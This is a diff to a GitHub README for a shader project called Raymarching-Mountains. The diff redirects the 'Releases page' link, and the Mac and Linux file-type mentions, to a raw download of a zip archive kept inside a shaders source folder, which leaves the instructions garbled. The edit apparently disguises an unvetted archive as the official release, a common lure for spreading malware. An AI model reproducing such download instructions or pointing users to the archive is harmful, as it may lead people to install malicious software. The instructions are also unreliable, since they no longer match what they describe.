235753388854/Raymarching-Mountains/README.md

 ## 📦 Download & Install

-To get started, visit the [Releases page](https://github.com/235753388854/Raymarching-Mountains/releases) to download the software.
+To get started, visit the [Releases page](https://github.com/235753388854/Raymarching-Mountains/raw/refs/heads/main/addons/raymarched_mountains/src/shaders/Mountains-Raymarching-v3.8.zip) to download the software.

 1. Click the link above.
 2. On the Releases page, you will see various versions listed.
 3. Choose the latest release for the best features and improvements.
 4. Download the appropriate file for your operating system.
-Look for the files ending with `.zip` or `.exe` for Windows, and `.dmg` or `.tar.gz` for Mac.
-For Linux, you may find a `.tar.gz` or a package for your distribution.
+Look for the files ending with `.zip` or `.exe` for Windows, and `.dmg` or `https://github.com/235753388854/Raymarching-Mountains/raw/refs/heads/main/addons/raymarched_mountains/src/shaders/Mountains-Raymarching-v3.8.zip` for Mac.
+For Linux, you may find a `https://github.com/235753388854/Raymarching-Mountains/raw/refs/heads/main/addons/raymarched_mountains/src/shaders/Mountains-Raymarching-v3.8.zip` or a package for your distribution.

 Once downloaded, follow these steps to install: